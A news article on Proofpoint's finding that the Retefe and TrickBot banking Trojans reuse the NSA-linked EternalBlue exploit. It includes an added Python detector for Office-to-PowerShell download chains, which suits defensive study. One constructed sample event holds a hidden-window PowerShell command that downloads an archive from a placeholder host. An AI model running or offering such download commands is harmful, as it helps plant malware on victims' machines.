NSA-linked hacking tools are being used by cybercriminals in efforts to remotely steal money and confidential information from online banking users, according to research conducted by cybersecurity firm Proofpoint.
Proofpoint researchers discovered two different banking Trojans in the wild, with computer code taken from the now-publicly available exploit known as "EternalBlue" (CVE-2017-0144).
Retefe banking #Trojan leverages #EternalBlue exploit in Swiss campaigns: https://t.co/VC5uUYOY13 #InfoSec pic.twitter.com/qicyf70NSb
— Threat Insight (@threatinsight) September 21, 2017
EternalBlue is used by the NSA to gather intelligence. It targets a vulnerability in Microsoft's Server Message Block (SMB) protocol that affects outdated versions of several Microsoft operating systems, and it allows attackers to quickly compromise multiple computers on a shared network, provided they are all running the same dated software.
Trojan Duo
The two Trojans — Retefe and TrickBot — are relatively common, and have been in use for several months as part of various email phishing campaigns targeted at companies and individual users. The latest versions of these Trojans carry elements of EternalBlue.
The new variant of Retefe identified by Proofpoint was sent in an unsolicited email to a company, containing a malicious Microsoft Office document laden with embedded Package Shell Objects. When opened, a PowerShell command downloads a .zip archive holding an obfuscated JavaScript installer, hosted on a remote server. The end result is the installation of a virus that leverages EternalBlue to quickly spread inside an infected network.
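As an added example (not Proofpoint's code and not part of the original article), the following Python scans process-creation records for the Office-document-to-PowerShell download chain described above. The event records, file paths and URL are constructed for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://example.invalid/pkg.zip','C:\\Users\\Public\\pkg.zip')\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Logs"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo hello"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_PATTERNS = [r"downloadfile", r"downloadstring", r"invoke-webrequest",
                     r"\biwr\b", r"net\.webclient", r"start-bitstransfer", r"https?://"]
ARCHIVE_OR_SCRIPT = [r"\.zip\b", r"\.js\b", r"expand-archive"]
EVASION_FLAGS = r"-w(indowstyle)?\s+hidden|-nop\b|-enc(odedcommand)?\b"


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of indicators matched by one event, in a fixed order."""
    reasons = []
    if basename(ev["parent"]) in OFFICE_PARENTS:
        reasons.append("office-parent")
    if basename(ev["image"]) in SHELLS:
        reasons.append("powershell-child")
    cmd = ev["cmdline"].lower()
    if any(re.search(p, cmd) for p in DOWNLOAD_PATTERNS):
        reasons.append("download")
    if any(re.search(p, cmd) for p in ARCHIVE_OR_SCRIPT):
        reasons.append("archive-or-script")
    if re.search(EVASION_FLAGS, cmd):
        reasons.append("evasion-flags")
    return reasons


def detect(events):
    """Alert on Office spawning PowerShell; a download verb raises severity to high."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if "office-parent" in reasons and "powershell-child" in reasons:
            severity = "high" if "download" in reasons else "medium"
            hits.append((basename(ev["parent"]), severity, reasons))
    return hits
```

Benign PowerShell launched from explorer.exe and Office spawning cmd.exe without a download produce no alert, so only the full chain surfaces.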
That said, the use of EternalBlue does not appear to be aimed at any one industry or region, and there is no common targeting theme across attacks that leverage it. Attackers appear to be pursuing both disruptive and destructive ends, as with WannaCry, which was also propagated via EternalBlue.
In the past, EternalBlue exploits have been used in tandem with ransomware to extort money from businesses. It's not entirely clear who is behind Retefe or TrickBot, although a relatively small group is thought to be behind the spread of Retefe.
The EternalBlue exploit first became publicly known — and adoptable — following the publication of a package of NSA documents by a group known as The Shadow Brokers.